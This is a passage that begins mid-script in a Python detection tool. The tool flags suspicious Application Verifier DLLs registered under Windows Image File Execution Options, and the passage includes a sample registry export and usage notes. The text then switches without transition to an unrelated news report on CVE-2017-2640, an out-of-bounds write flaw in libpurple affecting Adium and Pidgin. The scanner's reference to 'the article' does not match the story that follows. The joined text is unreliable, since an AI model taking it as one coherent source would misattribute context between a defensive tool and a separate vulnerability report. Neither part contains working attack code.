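        unknown = [d for d in dll_list if d.lower() not in KNOWN_VERIFIER_PROVIDERS]
        findings.append({
            "target": key.rsplit("\\", 1)[-1],
            "dlls": dll_list,
            "unknown_dlls": unknown,
            "severity": "high" if unknown else "review",
        })
    return findings


# Constructed export: a developer's legitimate verifier session on notepad.exe,
# a suspicious provider registered against a hypothetical security agent, and
# an unrelated IFEO entry that must not be reported.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="vrfcore.dll vfbasics.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\secagent.exe]
"GlobalFlag"=dword:00000100
"VerifierDlls"="updater.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"DisableExceptionChainValidation"=dword:00000000
"""

if __name__ == "__main__":
    for f in find_verifier_providers(SAMPLE_EXPORT):
        print(f"[{f['severity']:6}] {f['target']}: {' '.join(f['dlls'])}")
```

On a live host the input comes from `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg` (and the Wow6432Node copy on 64-bit systems); `reg export` writes UTF-16, so open the file with `encoding="utf-16"` before passing it to `find_verifier_providers`. A "review" finding is a normal Application Verifier session and is expected on developer machines; a "high" finding against a security product's process is exactly the footprint the article describes and warrants pulling the named DLL for analysis.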
A severe vulnerability has been disclosed in libpurple, the library used in the development of a number of popular instant messaging clients, including Pidgin and Adium for the macOS platform. Adium 1.5.10.2 is vulnerable and can be exploited to run arbitrary code remotely. A researcher who goes by the handle Erythronium submitted a post on March 15 to the Adium developers mailing list about the issue. While there’s been some discussion of a fix for CVE-2017-2640, no Adium advisory or patches have been released. In the meantime, Erythronium told Threatpost that libpurple and Adium should no longer be used. “Unless the [Adium] dev team comes out with an advisory about this issue, a serious apology, a completely solid story about how they plan to handle future vulnerabilities in their codebase and its dependencies, and a way for people to reproduce their builds without depending on a creepy binary blob of libpurple, people should simply stop using it,” the researcher said. “It’s also very arguable that people should stop using libpurple completely, since it also lacks strong security practices in its development”. A request for comment from two members of the Adium team was not returned in time for publication. “Adium’s build process documentation does not seem to include steps for upgrading or rebuilding libpurple, and the copy of libpurple [is] checked into Adium’s open-source repository as a binary blob of unknown provenance,” Erythronium wrote in a post to the Full Disclosure mailing list. Adium is a freely available IM client for the Apple platform, and users may connect a number of other IM networks to it, including AIM, Google Talk, Yahoo Messenger and others.
It’s written using the Cocoa API in macOS, and also supports Off the Record (OTR) encryption over XMPP. Libpurple is used in a number of IM programs, including Pidgin on Windows, Linux and UNIX builds and Finch, a text-based IM program for Linux and UNIX. The vulnerability is an out-of-bounds write flaw that happens when invalid XML is sent by an attacker, Pidgin said in an advisory. “Successfully exploiting this issue may allow an attacker to cause a denial-of-service condition, execute arbitrary code or perform unauthorized actions,” said a SecurityFocus advisory. The use of messaging apps that support encryption has been encouraged since the Snowden disclosures and other challenges to secure communication such as Apple vs. FBI. Adium specifically was included in a Privacy Pack recommended by the Electronic Frontier Foundation in the months following the Snowden leaks. The pack was a collection of tools for privacy conscious users, and included the Tor browser, encryption extensions for browsers, HTTPS Everywhere, and Pidgin and Adium for encrypted chats.